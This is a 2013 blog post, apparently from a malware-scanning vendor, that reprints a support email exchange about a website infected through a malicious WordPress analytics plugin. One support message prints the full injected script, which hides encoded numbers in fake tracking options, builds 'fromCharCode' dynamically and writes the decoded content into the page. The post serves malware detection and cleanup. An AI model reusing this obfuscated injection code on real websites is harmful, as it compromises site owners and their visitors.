Wednesday, March 20, 2013

Malicious WordPress plugin. Detection and resolution process.

Our team was contacted regarding the detection of the www.dnexpert.com website as Suspicious by our Online Malware Scanner.
Online malware scanner is available for everyone and the results are then posted in the database depending on the domain status.

The issue was that this domain was listed in Suspicious database: http://quttera.com/lists/suspicious. After the issue has been resolved we asked for website owner's agreement to place the whole discussion on our Forum and Blog so that it might help other webmasters to detect similar issues.

Mirza, kindly agreed so here is the thread:

We removed his last name for the privacy reasons.

On Sat, Mar 16, 2013 at 6:05 PM, Mirza wrote:
Hi guys, My website was infected by a malicious code when I installed a WordPress google analytics plugin from http://wordpress.org/extend/plugins/face-for-all-children-everywhere/ The plugin has since been detected by WordPress and removed as explained here: http://wordpress.org/support/topic/somethings-mixed-up-here I have checked my site and it no longer contains the malicious code, however, your plugin is not allowing me to rescan my site, it keeps giving me the cached results with the 4 malicious code detection. Can you please rescan my site? I don't want my url appearing in the suspicious urls database. My website is :www.dnexpert.com Thank you, Mirza


From: Quttera Support Team To: Mirza Sent: Saturday, 16 March 2013 5:37 PM
Subject: Re: remove from suspicious database
Hi Mirza, Thank you very much for using our WordPress plugin, please take a look on our monitoring service http://quttera.com/website-anti-malware-monitoring. This service will scan your site automatically every 24 hours and notify you if we found something suspicious thus providing you capabilities to detect malware on your site before it is blacklisted by Google and other blacklisting providers. We scanned your site one again and still see some potentially suspicious files. You can access this new report either from wordpress plugin or via this link: http://quttera.com/detailed_report/www.dnexpert.com The issue is with this script tag found on several pages:

[[<script type='text/javascript' language='javascript' > 
var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setOption', '6918518510413211618517817517017118416518918416718218217']);
_ga4.push(['_setOption', '1184165171180193182181185175186175181180128167168185181']);
_ga4.push(['_setOption', '1781871861711291691781751821281841711691861101221261181']);
_ga4.push(['_setOption', '8219011416718718618111416718718618111412212611818219011']);
_ga4.push(['_trackPageview', '1129195130117185186191178171132']);
var t=z="",l=pos=v=0,a1="arCo",a2="omCh";
for (v=0;
 v<_ga4.length;
 v++) t += _ga4[v][1];
l=t.length;
 while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
 document.write(z);
 </script>]]

The issue here is dynamic generation of "fromCharCode" method name which treated as JavaScript code obfuscation method. Do you aware of this script block? Thanks a lot, Michael

On Sat, Mar 16, 2013 at 6:48 PM, Mirza wrote:
Hi there, Thank you very much for replying. Yes, this is the malicious code I am worried about. I believe it was caused by a plugin that has since been removed from the WordPress repository. I have blogged about the entire ordeal here: http://www.dnexpert.com/2013/03/16/website-hacked-removing-the-google-analytics-malicious-wordpress-plugin/ I hope you don't mind me referencing your website and facebook page. Could you please do one more scan as I believe the malicious code was in my cached files which I have subsequently removed. I have also removed the offending WordPress plugin. Thank you very much. Mirza


From: Quttera Support Team To: Mirza Sent: Saturday, 16 March 2013 6:35 PM
Subject: Re: remove from suspicious database
Hi Mirza, Your website scanned again and found clean. Full report could be found here http://quttera.com/detailed_report/www.dnexpert.com Thank you very much for contacting us. Safe browsing and stay clean! Michael, Quttera support team.